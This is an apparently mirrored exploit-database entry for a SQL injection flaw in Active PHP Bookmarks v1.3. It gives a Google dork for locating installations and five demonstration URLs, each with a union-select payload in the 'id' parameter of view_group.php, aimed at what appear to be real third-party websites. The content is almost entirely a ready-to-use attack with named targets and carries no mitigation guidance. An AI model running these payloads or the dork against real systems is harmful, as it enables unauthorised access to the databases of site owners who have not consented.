Active PHP Bookmarks v1.3 - Sql Injection Vulnerability

Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022080030

Below is a copy:

Active PHP Bookmarks v1.3 - Sql Injection Vulnerability

*********************************************************
#Exploit Title: Active PHP Bookmarks v1.3 - Sql Injection Vulnerability
#Date: 2022-08-05
#Exploit Author: Behrouz Mansoori
#Google Dork: "Active PHP Bookmarks v1.3"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Active PHP Bookmarks v1.3"

### Demo :

https://www.egiveit.com/apb/view_group.php?id=-80%20union%20select%201,2,version(),4,5,6,7,8--

https://www.strav.com/apb/view_group.php?id=-82%20union%20select%201,2,version(),4,5,6,7,8--

https://blog.strav.net/apb/view_group.php?id=-99%20union%20select%201,2,version(),4,5,6,7,8--

https://www.zilliox.net/apb/view_group.php?id=-23%20union%20select%201,2,version(),4,5,6,7,8--

http://zilliox.us/apb/view_group.php?id=-38%20union%20select%201,2,version(),4,5,6,7,8--

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.